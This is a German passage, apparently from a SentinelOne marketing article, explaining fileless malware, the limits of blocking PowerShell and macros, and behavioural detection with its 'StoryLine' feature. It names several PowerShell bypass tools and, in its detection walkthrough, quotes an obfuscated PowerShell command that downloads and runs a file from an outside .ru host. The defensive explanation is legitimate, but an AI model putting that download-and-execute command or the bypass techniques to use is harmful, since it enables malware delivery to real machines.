eine Blockierung aus defensiver Sicht sinnlos wäre: Es gibt viele öffentliche Quellen, die erklären, wie man die PowerShell-Ausführungsrichtlinie umgeht und wie man PowerShell.exe auf andere Weise umgehen kann. Um nur einige zu nennen: Führen Sie PowerShell nur mit DLLs aus, mit einem einfachen rundll32-Befehl unter Verwendung von PowerShdll Konvertieren Sie PowerShell-Skripte in andere EXE-Dateien, mit Tools wie PS2EXE Verwenden Sie Malware, die eine eigene Kopie von PowerShell.exe nutzt oder die lokale PowerShell modifiziert, um die Erkennung von PowerShell durch Sicherheitsprodukte zu vermeiden Einbetten Sie ein PowerShell-Skript in die Pixel einer PNG-Datei und generieren Sie einen Einzeiler, um es mit Invoke-PSImageauszuführen. Blockieren von MS Office-Makrodateien Um diesen Angriffsvektor zu beseitigen, hat Microsoft eine Option hinzugefügt hinzugefügt, um Makros als Website-Einstellung zu deaktivieren (ab Office 2016). Da sie jedoch in den meisten Umgebungen weiterhin zugelassen sind, haben Sicherheitsanbieter dieses Problem hauptsächlich auf zwei Arten angegangen: Makros generell blockieren – damit werden die gleichen Einschränkungen durchgesetzt, die Microsoft für Unternehmen anbietet, die ohne Makros auskommen können Makrocode für statische Analysen oder Reputationsprüfungen extrahieren – Dies kann in einigen Fällen funktionieren. Der Nachteil dieses Ansatzes besteht jedoch darin, dass es äußerst schwierig ist, solchen Code innerhalb einer tolerierbaren Falsch-Positiv-Rate zu klassifizieren und zu erkennen, insbesondere bei noch nie dagewesenen bösartigen Makros. Darüber hinaus gibt es nur sehr wenige Repositorys mit gutartigem und bösartigem Code. Eine weitere Option besteht darin, nach typischen Funktionen zu suchen, die bei Angriffen häufig vorkommen, aber auch diese sind variabel und nicht umfassend katalogisiert Serverseitige Erkennung Einige Produkte verwenden nur agentenbasierte Überwachung und treffen die Entscheidung auf dem Server oder in der Cloud. Dieser Ansatz hat die gleichen Nachteile wie jede Erkennung, die nicht am Endpunkt stattfindet. Vor allem erfordert er eine Verbindung, und Prävention ist unmöglich, da der Agent auf die Antwort des Servers warten muss, bevor er handeln kann. Wie man dateilose Malware erkennt Dateilose Malware ist eine der am schwierigsten zu erkennenden Bedrohungen für herkömmliche Antivirensoftware und ältere Cybersicherheitsprodukte, da sie ältere signaturbasierte Erkennungs-, Whitelisting- und Sandboxing-Sicherheitsmethoden umgehen kann. Eine gute Möglichkeit, Ihr Unternehmen vor dateiloser Malware zu schützen, ist ein Threat-Hunting-Team, das aktiv nach Malware sucht. Anzeichen für einen Angriff werden in der Umgebung eines Unternehmens maskiert und vermischt. Es gibt verschiedene Möglichkeiten, wie dies in einem System auftreten kann, und es erfordert ein tiefgreifendes Verständnis der Bedrohungen, um dateilose Malware aufzudecken. Verhalten, nicht Identität Der Schlüssel liegt darin, das Verhalten der auf dem Endpunkt ausgeführten Prozesse zu betrachten, anstatt die Dateien auf dem Rechner zu überprüfen. Dies ist effektiv, da Malware-Varianten trotz ihrer großen und wachsenden Zahl sehr ähnlich funktionieren. Die Anzahl der Malware-Verhaltensweisen ist erheblich geringer als die Anzahl der möglichen Erscheinungsformen einer schädlichen Datei, sodass sich dieser Ansatz für die Prävention und Erkennung eignet. Obwohl SentinelOne mehrere Engines verwendet, darunter statische und verhaltensbasierte KI, eignet sich der verhaltensbasierte Ansatz besonders gut zur Erkennung und Prävention dieser Art von Angriffen, da er unabhängig vom Angriffsvektor ist.Die Wirksamkeit dieses Ansatzes zeigt sich in Beispielen wie der WannaCry Kampagne, bei der SentinelOne Kunden schützen konnte, bevor die Ransomware in freier Wildbahn aufgetaucht war.  Wie SentinelOne dateilose Malware stoppt SentinelOne überwacht alle Aktivitäten auf der Agentenseite auf Kernel-Ebene, um zwischen bösartigen und harmlosen Aktivitäten zu unterscheiden. Da der Agent bereits über den vollständigen Kontext verfügt: Benutzer, Prozesse, Befehlszeilenargumente, Registrierung, Dateien auf der Festplatte und externe Kommunikation, können alle bösartigen Aktivitäten vollständig unterbunden werden. SentinelOne kann alle böswilligen Handlungen rückgängig machen und ermöglicht es dem Benutzer, auf einem sauberen Gerät zu arbeiten. Im Wesentlichen ermöglicht SentinelOne Ihnen, die versteckten Kosten für die Bereinigung Ihres gesamten Netzwerks von schädlichem Code zu vermeiden. Aktive Inhalte Um diesen Ansatz effektiv umzusetzen, verwendet SentinelOne das "StoryLine"-Konzept, das das Problem der Zuordnung der Schuld an die Ursache böswilliger Aktivitäten löst. Nehmen wir beispielsweise an, ein Benutzer lädt über Outlook einen bösartigen Anhang herunter, der dann versucht, Dateien auf der Festplatte zu verschlüsseln. In diesem Szenario würde man die wahre Quelle der bösartigen Aktivität übersehen, wenn man Outlook als übergeordneten Prozess verantwortlich macht und unter Quarantäne stellt. Stattdessen sollte Outlook als Quelle für forensische Daten einbezogen werden, um diese anzuzeigen, aber nicht zu bekämpfen. Sie möchten jedoch die gesamte Bedrohungsgruppe bekämpfen, unabhängig von zusätzlichen Dateien, erstellten Registrierungsschlüsseln oder anderen schädlichen Verhaltensweisen. Mit StoryLine können wir die Ursache eines bestimmten bösartigen Ablaufs mit oder ohne Datei ermitteln und die Schuld dafür zuweisen, sodass der Kunde den Vorfall präzise bearbeiten kann. Erkennung und Abwehr – Schritt für Schritt Sehen wir uns einen Ablauf an, bei dem der Benutzer ein Word-Dokument per verschlüsselter E-Mail erhalten hat. Der Benutzer kennt den Absender und lädt das Dokument daher auf seinen Desktop herunter und öffnet es. Sobald er die Datei öffnet, erhält er Folgendes: Sobald "Ja" angeklickt wird, startet der Angriff. Sehen wir uns an, was der SentinelOne-Agent erkennt (in diesem Beispiel im Erkennungsmodus). Der Administrator kann genau untersuchen, wie jedes Element in dieser Geschichte zum Angriff beigetragen hat. SentinelOne zeigt die genaue Befehlszeile an, die den PowerShell-Befehl aufruft: -ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:UsersadminAppDataRoaming.exE');START-proceSS 'C:UsersadminAppDataRoaming.exE' In einem realen Szenario behebt der SentinelOne-Agent das Problem sofort. Dies geschieht automatisch, ohne dass der Administrator Maßnahmen ergreifen muss. Der Administrator wird per SMS, SIEM oder E-Mail benachrichtigt. Fazit Letztendlich werden Angreifer immer den kürzesten Weg wählen, um Endpunkte zu kompromittieren, um mit möglichst geringem Aufwand den größtmöglichen Gewinn zu erzielen. Dateilose Malware wird schnell zu einer der beliebtesten Methoden, um dies zu erreichen. Um solche Angriffe zu verhindern, reicht es nicht aus, wichtige Vorgänge wie PowerShell zu blockieren. Hier kommt SentinelOne ins Spiel, basierend auf verhaltensbasierter KI-Erkennung und mehrschichtiger Sicherheit, seine Stärken aus – es deckt Exploits, Makrodokumente, Exploit-Kits, PowerShell, PowerSploit und Zero-Day-Schwachstellen , ohne die tägliche Produktivität Ihrer Mitarbeiter zu beeinträchtigen. Fordern Sie eine Demo an und erfahren Sie mehr darüber, wie SentinelOne Sie vor dateiloser Malware und Zero-Day-Angriffen schützen kann!"

Mehr lesen
Sind Sie bereit, Ihre Sicherheitsabläufe zu revolutionieren?

Sind Sie bereit, Ihre Sicherheitsabläufe zu revolutionieren?

Entdecken Sie, wie SentinelOne AI SIEM Ihr SOC in ein autonomes Kraftpaket verwandeln kann. Kontaktieren Sie uns noch heute für eine persönliche Demo und erleben Sie die Zukunft der Sicherheit in Aktion.

Demo anfordern